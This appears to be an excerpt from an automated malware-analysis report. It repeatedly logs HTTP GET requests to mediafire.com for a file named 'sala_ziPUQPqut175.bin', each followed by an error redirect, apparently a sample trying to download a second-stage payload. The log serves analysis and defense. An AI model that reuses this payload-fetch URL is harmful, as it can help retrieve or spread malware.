Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
